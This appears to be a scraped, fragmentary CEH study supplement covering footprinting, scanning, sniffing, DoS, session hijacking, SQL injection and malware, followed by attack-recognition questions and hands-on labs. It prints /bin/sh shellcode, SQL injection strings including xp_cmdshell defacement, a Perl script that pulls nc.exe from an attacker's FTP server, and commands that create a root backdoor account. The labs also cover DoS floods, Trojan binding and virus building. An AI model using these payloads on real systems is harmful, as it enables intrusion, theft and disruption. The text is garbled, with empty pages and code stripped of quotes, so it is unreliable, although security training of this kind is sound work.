Professional Documents
Culture Documents
CEH Supplement v9 5
CEH Supplement v9 5
Hacker University
Page 3
Footprinting
20. Footprinting is the blueprinting of a security profile of an organization 21. Examples of footprinting tools include: SamSpade NSLookup Traceroute NeoTrace 22. NSLookup is a program to query Internet domain name servers. It is used to display DNS information. 23. Type the following to do a zone transfer with NSLookup: Nslookup (takes you into interactive mode) ls d targetsite.com 24. Zone transfers allow you to list all DNS information for a domain 25. Below is an example of a log entry that shows a possible zone transfer: Mar 12 01:44:12 [3142]: IDS181/nops-x86: 12.55.180.48 -> 10.8.0.7:53 26. There are several types of DNS records: A host record CNAME alias MX mail exchange (mail server) NS name server SOA start of authority 27. A DNS zone is a collection of domains. You can use tools such as NSLookup, Dig, Sam Spade, or Host to perform a zone transfer. 28. The highest priority MX record has the lowest number 29. A DNS SOA record will contain the following: Serial number revision number (sometimes called version number) Refresh refresh interval for secondary DNS servers Retry retry interval if zone transfer fails
Hacker University
Page 5
Hacker University
Page 6
Hacker University
Page 7
Nmap sT Nmap sS
SYN SYN
Hacker University
Page 8
FIN XMAS
Nmap sF Nmap sX
Proto TCP
State
PID 125
Listening
Hacker University
Page 10
Hacker University
Page 11
Enumeration
103. If NMAP was unable to identify the operating system of a web server, telnet to an open port and grab the banner. 104. Enumeration tools include USER2SID, SID2USER, and DumpSec. 105. The SID ending in 500 is the built-in Administrator account. 106. If the Administrator account has been renamed but you still know the SID, you can use sid2user to find the new name of the Administrator account. 107. The default passwords (community-strings) in snmp are private (readwrite) and public (read-only). These community strings are sent in clear-text and is therefore susceptible to sniffer. 108. You should use SMB signing to protect against hackers modifying SMB packets and forwarding them. 109. If you must run an SMTP server, you cannot prevent people from using telnet to connect to port 25 on your e-mail server. 110. Hackers will often send a single SMTP message to an address that does not exist to gather information about internal hosts used in e-mail treatment. 111. To grab a banner of a web server, telnet to port 80 and type HEAD / HTTP/1.0. 112. An attacker may scan port 137 to check for file and print sharing on Windows systems.
System Hacking
113. If L0phtcrack is unable to capture any logons when attempting to sniff SMB exchanges, it could be that the network is using Kerberos.
Hacker University Page 12
Hacker University
Page 13
Hacker University
Page 14
Hacker University
Page 15
Sniffers
171. You can get around switches by using ARP spoofing, MAC duplicating, and MAC flooding. ARP spoofing the default gateway is a common method to capture traffic when using a switched network. Without other techniques like MAC flooding or ARP spoofing, you will not be able to capture traffic on a switched network. Use ./macof to flood the port to MAC address table (CAM table). This will move the switch into broadcast mode and allow you to sniff all packets on the network. 172. Ettercap and Ethereal (now Wireshark) are popular sniffers. Sniffers work best on networks using hubs. To detach Ettercap from the console and log all sniffed passwords to a file, use the command: ettercap NCLzs quiet Ethereal allows for filters. For example, to create a display filter that only looks for the three-way handshake for a connection from host 172.16.0.4, the filter would be: ip.addr==172.16.0.4 and tcp.flags.syn
Hacker University Page 16
Denial of Service
178. A smurf attack is when you send a broadcast ping with a spoofed source address of your target. A fraggle is similar to a smurf attack but uses UDP. 179. A SYN flood is a DOS attack in which a large number of SYN packets appear on a network without the corresponding reply packets. 180. A LAND attack is when an attacker forges a TCP/IP packet, causing the victim to try and open a connection with itself. This causes the system to go into an infinite loop which, in turn, can slow down the system. 181. The following are techniques used to block against SYN flood attacks: Micro blocks: instead of allocating a complete connection object, simply allocate a micro-record. SYN cookies: instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as hash of the clients IP address, port number, and other information. When the client responds with a normal ACK, the sequence number will be included which the server then verifies. RST cookies: An alternative to SYN cookies where the server sends a wrong SYN/ACK back to the client. The client should generate a RST packet telling the server that something is wrong, which informs the server that the client is valid. Stack tweaking: TCP attacks can be tweaked to reduce effects of SYN floods. For example, timeouts can be changed. 182. A Ping of Death attack sends fragmented ICMP packets that, when reconstructed, is larger than 65,536 bytes. 183. IDS devices are primary victims to smurf attacks.
Hacker University
Page 17
Session Hijacking
194. To perform a session hijack, you must find the sessions, predict the sequence number, and take over the session. 195. Strong authentication is not enough to call your network secure because someone could always perform session hijacking to take over sessions that are already authenticated. This is the key advantage to session hijacking: taking over an already authenticated connection. 196. Hunt is a common session hijacking tool. It can intercept traffic then perform a man-in-the-middle attack (MiTM). 197. In a Man-in-the-middle (MiTM) attack, an attacker will intercept a transmission to copy and forward all packets between two hosts. 198. Using unpredictable sequence numbers will help secure against session hijacking. 199. TCP/IP session hijacking is carried out on the transport layer. 200. Challenge/response authentication is used to prevent session hijacking attacks. 201. Use unpredictable sequence numbers to secure sessions against hijacking.
Hacker University Page 18
Buffer Overflows
203. Canary words are a method used by compilers to send an alarm if a buffer overflow has been attempted. Canary adds NULL (0x00), CR (0x0d), LF (0x0a), and EOF (0xff). If they get altered when a function returns, an alarm is sent. 204. NOP sleds send a series of NO Operation instructions in an attempt to guess the return pointer. The hexadecimal value for NOPs is 0x90. 205. The following code is usually an indication of a buffer overflow attack: char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\ x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8 d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\ x62\x69\x6e\x2f\x73\x68"; 206. Buffer overflows can be exploited using such function calls as fgets(), scanf(), strcpy() and strncpy(). 207. Buffer overflows are due to programming errors and bad quality assurance practices. 208. Polymorphic shell code works by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode. 209. Two types of buffer overflows are heap based and stack based. 210. When writing shell code, be sure to remove any null bytes as that will end the string. 211. Buffer overflows will overwrite the ESP register with a return address of the exploit code. 212. The following pseudo code demonstrates the logic of stopping a stack from holding more than 200 characters in a buffer: IF (I > 200) then exit (1) 213. Many IDS devices will have signatures for common buffer overflow attacks. Attackers can get around this by using polymorphic shell code with a tool such as ADMutate to change the signature of their exploits. 214. Using printf(str) instead of printf(%s,str) may leave your program exposed to format string attacks. 215. Buffer overflows often try to exploit an application and launch a command shell. Below is an example of output from a network IDS of an attack that is trying to get a Linux command shell (/bin/sh):
Hacker University
Page 19
Hacker University
Page 20
Hacker University
Page 21
Linux Hacking
248. ps is the command to list processes running on a system. 249. Rootkits can be used to hide processes, files, or registry entries. 250. The three most common commands that hackers attempt to Trojan on a Linux box are netstat, ps, and top. 251. Loadable Kernel Modules (LKM) are compiled on the fly; they do not require you to recompile the kernel). 252. Cygwin is a free UNIX subsystem that runs on top of Windows.
Hacker University
Page 22
Cryptography
262. Hashing algorithms are used to guarantee the integrity of messages. SHA-1 creates a 160-bit hash; MD5 creates a 128 bit hash. Note: on the exam you may see this referred to as the number of bits of encryption and not the word hash. 263. Integrity can be defined as sound, unimpaired or perfect condition. 264. RC4 is the only stream cipher. Stream ciphers are a type of symmetric key encryption algorithm that transforms a stream of plaintext characters into a stream of ciphertext characters of the same length. 265. The tradeoff of encryption is speed. IPSEC VPNs can slow down your network. 266. Cryptography attacks include chosen-ciphertext, known ciphertext, and replay attacks 267. PKI is a way to distribute symmetric keys, usually by using asymmetric encryption techniques. 268. With XOR operations, if both values are the same, the result is zero. If the values are different, then the result is one. Value1 0 Value2 0 Result 0
Hacker University
Page 23
SQL Injection
276. You can test SQL injection by entering a single quote or by typing anything or 1=1 in a username field on a web site. 277. The next step after determining that a web site is vulnerable is to identify the database and table name by running: http://www.mysite.com/test/include.asp?numberID=4 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=U),1))) > 109 278. An example of SQL injection is http://www.testsite.com/data.asp?name=me%27%3bupdate%20user table%20set%20pass%3d%27letmein%27%3b--%00 279. SQL injection can be used where there are poorly designed input validation routines. 280. The following is an example of code that is susceptible to a SQL injection attack because it provides no input validation: sSQL=SELECT * FROM Users where Username= & Request(user) & and Password= & Request(pwd) & `
Hacker University
Page 24
Viruses
298. Messenger spam is when you receive a pop up on your screen with SPAM. It usually uses ports 1026 to 1029.
Hacker University
Page 25
Hacker University
Page 26
Hacker University
Page 27
Social Engineering
329. You will need to enforce the corporate network security policy to resolve issues with employees bypassing the firewall by attaching a modem to their telephone line and workstations. 330. Social engineering can help you bypass a firewall. For example, you can create a web page that users can click on and, upon clicking, a keylogger can be embedded on their system. 331. Social engineering is the act of getting needed information from a person rather than breaking into a system. 332. An example of a phishing attack is when you receive an e-mail asking you to click on a link that takes you to a different site than what is mentioned in the e-mail. 333. The current most common vehicle for social engineering attacks is e-mail. 334. Social engineering is easy and extremely effective method to gain information. 335. The best way to break into a highly secure system that is virtually impenetrable is to use social engineering tactics like bribing employees with money to provide you with sensitive information. 336. The weakest links in the security chain are untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain. 337. To determine the first octet of a DWORD encoded URL, divide the number by 16,777,216. 338. Another method of obfuscating URLs is to use hexadecimal equivalents. For example, 0xde = 222. 339. The three stages of reverse social engineering are sabotage, advertising/marketing, and assisting.
Physical Security
340. Piggybacking (also called tailgating) is when someone walks in behind an authorized user to gain access into a building. 341. RFID tags are often used to manage inventory but they could leak out sensitive information so they should be disabled when the tags are no longer needed. Use RFID kill switches in RFID chips to disable RFID tags when they are no longer needed
Hacker University
Page 28
Attack #2
GET /msadc/../../../winnt/system32/cmd.exe?/c+dir+c:\HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.mspowerpoint, */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)..Host: lib.bvxttrip.org..Connection: Keep-Alive..Cookie: ASPSESSIONIDGQQQQQZU=KNOHEMW
Hacker University
Page 29
Attack #3
A screen pops up on your screen with the following message: Message from SYSTEM to ALERT on 7/19/2005 6:00:03 PM
STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION. Windows has found Critical Errors. To fix the errors please do the following: 1. Download Registry Repair from http://www.repairreg.com 2. Install Registry Repair
3. Run Registry Repair 4. Reboot your computer FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION What could cause this message? A. Windows messenger SPAM B. MyDoom virus C. Beast Trojan D. Denial of Service attack
Hacker University
Page 30
What does this mean? A. Attacker is using NAT. B. Attacker modified TCP/IP stack on the attacking system. C. 77 packets are from a single subnet while 13 of the packets are from a different subnet. D. ICMP ID and Sequence numbers are set by a tool and not the operating system.
Attack #5
Log entry: 1/19-13:22:01:44:812319 192.168.145.98:21 -> 200.100.50.25:4214 TCP TTL:63 TOS:0x10 ID:11842 DF
Attack #6
Mkdir p /etc/X11/appInk/Internet/.etc Mkdir p /etc/X11/appInk/Internet/.etcpasswd Touch acmr /etc/passwd /etc/X11/AppInk/Internet/.etcpasswd Passwd nobody d /usr/sbin/adduser dns d/bin u 0 g 0 s/bin/bash Hacker University Page 31
Attack #7
12/09-01:22:31.167035 207.219.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53476 DF *****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78 TCP Options => NOP NOP TS: 126045057 105803098 50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 PASS . 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ..
Hacker University
Page 32
Attack #8
############################################ $port = 53; $your = 192.168.1.1; $user = Anonymous; # Spawn cmd.exe on port X # Your FTP server #login as #password
$pass = noone@nowhere.com;
############################################ $host = $ARGV[0]; print Starting\n; print Server will download the file nc.exe from $your FTP server.\n; system(perl msadc.pl h $host C \echo open $your >sasfile\); system(perl msadc.pl h $host C \echo $user>>sasfile\); system(perl msadc.pl h $host C \echo $pass>>sasfile\); system(perl msadc.pl h $host C \echo bin>>sasfile\); system(perl msadc.pl h $host C \echo get nc.exe>>sasfile\); system(perl msadc.pl h $host C \echo get hacked.html>>sasfile\);
Hacker University
Page 33
What does this code do? A. Creates a share called sasfile B. Creates a backdoor account C. Opens a telnet listener that requires no username or password D. Creates a FTP server
Attack #9
use Net::DNS::Resolver; use Net::RawIP; open(LIST,ns.list); @list=<LIST>; close LIST; chomp(@list); my $lnum=@list; my $i=0; my $loop=0;
Hacker University
Page 34
What type of attack is this? A. DNS lookup attacks B. DNS reflection and amplification attack C. FTP DOS D. FTP backdoor
Hacker University
Page 35
C:\>type file.txt C:\>copy file.txt c:\inetpub\wwwroot C:\>GET file.txt HTTP/1.1 Server: Microsoft-IIS/4.0 Date: Sun, 04 Feb 2001 15:44:12 GMT ETag: 9814ed8abc83103:8ff Content-Length: 5131
Hacker University
Page 36
Hacker University
Page 37
Return-Path: <bgates@microsoft.com> Received: from smtp.com (fw.emumail.com [215.52.220.122]. by raq-221-181.ev1.net (8.10.2/8.10.2. with ESMTP id h78NIn404807 for <mikeg@thesolutionfirm.com>; Sat, 9 Aug 2003 18:18:50 -0500 Received: (qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000 Received: from ([19.25.19.10]. by smtp.com with SMTP Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123. by localhost with SMTP; 8 Aug 2003 23:25:01 -0000 From: "Bill Gates" <bgates@microsoft.com> To: "mikeg" <mikeg@thesolutionfirm.com> Subject: We need your help! Date: Fri, 8 Aug 2003 19:12:28 -0400 Message-ID: <51.32.123.21@CHRISLAPTOP> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0052_01C35DE1.03202950" X-Priority: 3 (Normal. X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal
Attack #13
The following code is vulnerable to what type of attack? <% Set objConn = CreateObject("ADODB.Connection") objConn.OpenApplication("WebUsersConnection") sSQL="SELECT * FROM Users where Username=? & Request("user") & _ "?and Password=? & Request("pwd") & "? Set RS = objConn.Execute(sSQL) If RS.EOF then Response.Redirect("login.asp?msg=Invalid Login") Else Session.Authorized = True Set RS = nothing Set objConn = nothing Response.Redirect("mainpage.asp") End If %>
Hacker University
Page 38
Attack #15
Below is a sample output of a web log. What type of attack is being performed her? Attempted login of unknown user: johnm Attempted login of unknown user: susaR Attempted login of unknown user: sencat Attempted login of unknown user: pete''; Attempted login of unknown user: ' or 1=1-Attempted login of unknown user: '; drop table logins-Login of user jason, sessionID= 0x75627578626F6F6B Login of user daniel, sessionID= 0x98627579539E13BE Login of user rebecca, sessionID= 0x9062757944CCB811 Login of user mike, sessionID= 0x9062757935FB5C64
Hacker University
Page 39
Footprinting
Footprint the http://www.certifiedhacker.com web site. Suggested tools: www.dnsstuff.com Sam Spade Smart Whois www.archive.org www.kloth.net IP2Country NewTracePro Visual Route www.centralops.net Which ISP Owns IP WhereIsIP
Hacker University
Page 40
Scanning
1) Nmap. Launch a packet sniffer (Ettercap, Ethereal/Wireshark, etc.) and run various Nmap scans against other hosts in the classroom. Watch for RSTs, SYN/Acks, etc. coming from the host you are scanning. 2) Hping Read through the Hping2 man page (available online or in Linux) Perform a port scan on a computer in the classroom Experiment with different options in Hping2 to try different types of scans
Bonus: Read the Hping3 man page. Use Hping3 to scan a computer in the web site. Do you prefer Hping3 or Hping2? Why?
Hacker University
Page 41
Enumeration
Ask another student or your instructor to set up additional accounts and some shares on their computer.
What is the password of the Administrator? (Hint: NAT or Venom can help you with this)
How do you protect against NULL sessions? (Hint: It can be done in the registry or in the local security policies).
System Hacking
Password Cracking Create three additional users on your computer. Assign one user a short dictionary password of less than eight characters. Give a blank password to another. Assign a difficult password to the third.
Hacker University
Page 42
Are you able to get the passwords of the other accounts? Steganography Hide the message youve been hacked on your computer. Suggested tools: NTFS Alternate Data Streams Snow NT Rootkit Blindside
Hacker University
Page 43
Read the Netcat man page. What other things can you do with Netcat?
Can you think of any ways you might get the Trojan on the victim host?
Detect the ports and processes running on your computer. Suggested tools: Fport TCP View Whats on my computer? Hacker Eliminator Process Viewer Windows task manager Netstat Did you find any Trojans running on your computer? If so, what ports are they listening on? Trojan Wrappers Using Yet Another Binder (YAB), bind a Trojan with a Windows program (such as Solitaire or Calculator).
Sniffers
1) Sniff web traffic on the network. Suggested tools: Ettercap (Linux) Windump/tcpdump
Hacker University
Page 44
2) MSN chat Work with a partner to set up MSN Messenger on your computers. Launch a sniffer and chat with each other. Can you see each others conversation? Download the MSN IM encryption software Simplite (www.secway.fr) and re-launch MSN IM. Can you see each others conversation? 3) E-mail Set up a free e-mail account on mail.com. Configure Outlook Express for your new POP account. Run the sniffer in the background while you send test messages. Can you see your password and/or your e-mail messages? 4) ARP poisoning / MAC flooding Test out ARP poisoning and/or MAC flooding to capture all traffic. Suggested tools: Ettercap (Linux) Macof (Linux) Cain & Abel Can you see traffic from other hosts?
Denial Of Service
As a class, agree on a denial of service tool and launch it against a single computer in the classroom. Suggested tools: DDOSPing Blast20 Nemesy13 Datapool If possible, launch multiple processes of these tools. On the victim host, launch task manager and/or performance monitor to see if you are making an impact.
Hacker University
Page 45
In a previous article, I discussed ARP poisoning and password detection tools. This takes that article to the next level and discusses how to hijack sessions. Sniffing networks (or ARP poisoning to sniff switched networks) is a great way to collect passwords. Unfortunately, tools like Dsniff and ettercap aren't always capable of detecting every password that crosses the network. This is where session hijacking can become your friend (or your worst enemy depending on which side of the infosec coin you're on.) In this article I will detail Netflood's test results and the techniques we used to hijack active sessions. Abstract: In order to session hijack traffic, multiple attacks or techniques may have to take place. For example, one may have to DoS attack a server in order to keep it from sending RST (reset) packets to the victim. If I were to detail a DoS technique (with every available argument) it would distract thoughts away from the real topic of this article. Some knowledge will have to be gleaned from RFC's, man pages, code comments, by researching on your own, or by merely using your intelligence to conceive of vulnerabilities not discussed herein; Hence, the word "primer". No one wrote me a little "session hijacking for dummies" book and I figured it out, so you can too.
Disclaimer: This paper describes nothing more than some vulnerabilities of the Transmission Control Protocol and tools/thoughts which exploit those vulnerabilities. It is intended for educational use only. You are responsible for what you do with this information. I am no more responsible for people committing crimes with this information then chemistry instructors are responsible for people who construct bombs or chemical warfare devices. [Insert expensive lawyer jargon here to stave off unfounded FBI allegations ala Sil]. All your base are belong to us. Contents: A look at TCP
Hacker University
Page 46
A Look At TCP Transmission Control Protocol (TCP) is addressed in RFC 793. For the sake of brevity, I will only cover relevant portions of the RFC; adding information to it when necessary. The Transmission Control Protocol (TCP) is intended for use as a highly reliable host-to host protocol between hosts in packetswitched computer communication networks, and in interconnected systems of such networks. TCP must recover from data that is damaged, lost, duplicated, or delivered out of order by the internet communication system. This is achieved by assigning a sequence number to each octet transmitted, and requiring a positive acknowledgment (ACK) from the receiving TCP. If the ACK is not received within a timeout interval, the data is retransmitted. At the receiver, the sequence numbers are used to correctly order segments that may be received out of order and to eliminate duplicates. Damage is handled by adding a checksum to each segment transmitted, checking it at the receiver, and discarding damaged segments.
A fundamental notion in the design is that every octet of data sent over a TCP connection has a sequence number. Since every octet is sequenced, each of them can be acknowledged. The acknowledgment mechanism employed is cumulative so that an acknowledgment of sequence number X indicates that all octets up to but not including X have been received. This mechanism allows for straight-forward duplicate detection in the presence of retransmission. Numbering of octets within a
Hacker University
Page 47
It is essential to remember that the actual sequence number space is finite, though very large. This space ranges from 0 to 4294967295 (2**32)-1. Since the space is finite, all arithmetic dealing with sequence numbers must be performed modulo 2**32 (4294967296). This unsigned arithmetic preserves the relationship of sequence numbers as they cycle from 2**32 - 1 to 0 again. There are some subtleties to computer modulo arithmetic, so great care should be taken in programming the comparison of such values. So you see that the ISN can be any number between 0 and 4294967295. You also hopefully noticed that every octet has a sequence number, not every session. The server (TCPB) will respond to the client (TCPA) with it's own sequence number, while acknowledging the clients sequence number. See below for an example:
Sequence prediction to take over networks was first written about in 1985 (or thereabouts) by none other than Robert T. Morris (his son created the first Internet worm). The first attack employing this technique did not occur until Christmas of '94, this is known as the Mitnick hack of Shimomura (or "Christmas hack"). Over the years, OS's have become more random in deriving the ISN, but we all know that computers are not random thinkers. Eventually over time, even computers choosing random numbers will repeat themselves, because the randomness is based on an internal algorithm. There is a great in-depth article, which can be found here, that explores sequence number generation and prediction in more detail.
Once a sequence number has been agreed to, all following data will be the ISN+1. This makes injecting data into the communication stream possible, if one were so inclined. The tricky part is not hijacking the session, but in finding out the ISN. Once the ISN (or the ISN increment) is discovered, everything else is gravy. 3 requirements to hijack non-encrypted TCP communications: 1. There must be non-encrypted session oriented traffic.
Hacker University
Page 48
If the attacker is on your local segment, they can sniff the connections and therefore see what the ISN+1 number is, they can also have the traffic routed back to them by poisoning the ARP cache. This is why implementing internal network protocol encryption is so important (albeit rarely done).
Local Network Session Hijacking Rather then reinvent the wheel, we used a tool that's readily available, called Hunt (downloadable @ netflood.net). We will use the newest version (1.5) because it runs on WindowsME (that's just a joke to get the kiddies hopes up), you'll actually need Linux or some other *nix variant (though you may have to port Hunt to work with your specific OS). In my case, I have a test machine running Redhat 7.1 and it works fine. You shouldn't have a problem using Hunt with any Linux 2.X kernel. 1. Start hunt 2. Select the "u" option (host up tests). This will enable you to see TCP connections on your network (ie. victims) 3. Enter the victims IP address or your network address 4. Enter victims IP address again or the broadcast address of your local network (This will insure that our entire network can be victims of this attack). 5. Choose the default answers unless you know what you're doing. Hunt will now look for victims (based on the range) using a variety of techniques such as ARP broadcasting and pinging. 6. Choosing "yes" for net ifc promisc test (arp method) option will enable Hunt to do a promiscuous interface test using an ARP broadcast. 7. Pick the default MAC address 8. Hunt will now want to do a promiscuous test using ping, choose "yes" and default MAC address for remaining options.
At this point you will be returned to the main menu. Hacker University Page 49
We can now watch the entire communication. So if the victim telnets to a server, we will see him authenticating and doing whatever he decides to do. If he telnets from that server to another server we can watch him log in and get any information we need. We could just sit and watch the communication all night but the problem is the victim is typing extremely slow, and that can be irritating for those of us who type fast. Since that's the case, we should now take over and type for him.
Press control-c and when prompted, to end the show you've just been watching. You will then be presented with the main screen. We are going to do an "arp/simple hijack" so we choose option "a".
We are again presented with a list of TCP sessions. I'll choose option "0" (or whatever communication I choose).
I'm going to spoof all addresses, so I'll use the "yes" defaults. Any old source MAC address will do, so I'll keep the defaults. I'll press enter and accept the raw input mode. Since I want to see everything I will dump all connections. Choose whether or not to print source and destination same characters, in my case I will choose "no". I now need to press control-c to input myself into the connection.
Hacker University
Page 50
I have now hijacked the victims session and I can do anything the user was allowed to do. You may be asking why you choose any MAC address instead of yours. The answer is because we are cache poisoning the devices which will relay the traffic to us, whether it is a switch, a router, or every host on our network segment. This was covered in a previous netflood article here.
If you are wondering why we shouldn't "force the ARP spoof", keep reading. It's actually fundamental networking concepts. This option would only be valid if we were attempting to hijack a session that was taking place between two hosts on our network segment.
Remote Network Session Hijacking: This is far more difficult to do today then it was in yesteryear, but it is not impossible. As this is only a "primer", I'm not going to go into exact details for determining an ISN (you can go here for more), but I will give you the fundamental knowledge necessary to help you with the next steps.
Remote Network Session Hijacking (RNSH) leaves the attacker blind. This is why RNSH is also referred to as "blind spoofing". The reason is because we are exploiting trust relationships between client and server on a remote network. The trust relationship is established by the rhosts file created when using services such as rlogin, rsh, or rcp. We cannot spoof a trusted host (found in the rhosts file) on a different network and see the reply packets because they are never routed back to us. We cannot ARP cache poison machines on remote networks because routers do not route ARP broadcasts across the Internet (newbie note: ARP is a layer2 function, routers work at layer3 ). Since we cannot receive the reply traffic we must anticipate the responses from the victim and keep the host we are pretending to be (spoofing) from sending a RST to the victim.
RNSH takes advantage of trust relationships between computers and you are spoofing the trusted client. If the correct spoof rules are configured on edge routers or border gateways, you will have a tremendously hard time performing a RNSH.
Hacker University
Page 51
The best way for you to see blind spoofing in action is to read Shimomura's breakdown of Mitnicks *cough* alleged *cough* attack.
Defending against session hijack attacks 1. Use encrypted protocols, like those found in the OpenSSH suite The OpenSSH suite includes the ssh program which replaces rlogin and telnet, scp which replaces rcp, and sftp which replaces ftp. Also included is sshd which is the server side of the package, and the other basic utilities like ssh-add, ssh-agent, ssh-keygen and sftpserver. 2. Use strong authentication (like Kerberos) or peer-to-peer VPN's. 3. Configure the appropriate spoof rules on gateways (internal and external). 4. Monitor for ARP cache poisoning, by using IDS products or ARPwatch.
Buffer Overflow
1. Start Knoppix
Hacker University
Page 52
Hacker University
Page 53
Hacker University
Page 54
Hacker University
Page 55
Lab#2
Use the Metasploit command line and web interface to hack into another machine. Experiment with different options.
Linux Hacking
Open Linux and run TCPDump from the command line. Try out the following options. (You may want to generate some traffic from your machine in order to capture traffic) To list the available interfaces tcpdump -D To show all traffic on eth1 tcpdump -i eth1 To capture just TCP tcpdump TCP To capture just UDP tcpdump UDP To capture just 1 port tcpdump port 23 To Dump to a pcap file tcpdump -i eth0 -w test.pcap To read back the packet file tcpdump -r test.pcap To capture only info on src IP and dst IP and protocol, and supress DNS tcpdump -i eth1 -nn -q Read back packet but suppress dns lookup tcpdump -nnr test.pcap
Hacker University
Page 56
SQL Injection
Lab#1 1. Discover a list of databases: select * from master..sysdatabases
Hacker University
Page 57
3. Using a database called Juggybank, get a list of information from the credit card table: select * from juggybank..Creditcard;
4. Using a database called Juggybank, get a list of information from the UserInfo table: select * from juggybank..userinfo;'
5. Get a list of information from the UserInfo table where username='joker': select * from juggybank..userinfo where username='joker';
6. Get a list of information from the UserInfo table where username='joker' and password='joker': select * from juggybank..userinfo where username='joker' and password='joker';
7. Get a list of information from the UserInfo table where username='joker' and password='' (You should get no records back because the password for the joker user is not blank): select * from juggybank..userinfo where username='joker' and password='';
8. Get a list of information from the UserInfo table where username='joker' and password='' or return all rows if 1 is equal to 1: select * from juggybank..userinfo where username='joker' and password='' or 1=1--;
Lab#2 Perform SQL injection on your web site. Go to the Coastal Banc Online Banking Demo web site on your desktop.
Hacker University
Page 58
Next, attempt to login with an invalid username and password. This should fail.
Next, enter the username of: ' OR 1=1 And enter any password you wish. This should return the first record.
Lab#3 Go to http://localhost/sql/client2.htm In the Login name field, type the following to create a file on the hard drive of the web server: ';exec master..xp_cmdshell "echo you've-been-hacked > c:\inetpub\wwwroot\default.asp" Do not enter anything for the password and press submit. Open http://localhost.
Lab#4 Using the same technique as SQL injection lab#2, get Netcat started on your victim host and gain access to the command prompt. Hint: xp_cmdshell and TFTP
Lab#5 Using SQL injection and the tools in the web hacking and web application hacking sections, attempt to hack into another computers Coastal Bank web site. Objectives:
Hacker University
Page 59
Wireless Hacking
1. If you have a laptop with wireless connectivity, download NetStumbler and use it to find wireless networks. 2. Using Ethereal/Wireshark, sniff the wireless traffic. Why do you see more traffic in a wireless network than in a wired switched network?
Viruses
Create your own virus using the Windows Scripting Host Worm Construction Kit.
Hacker University
Page 60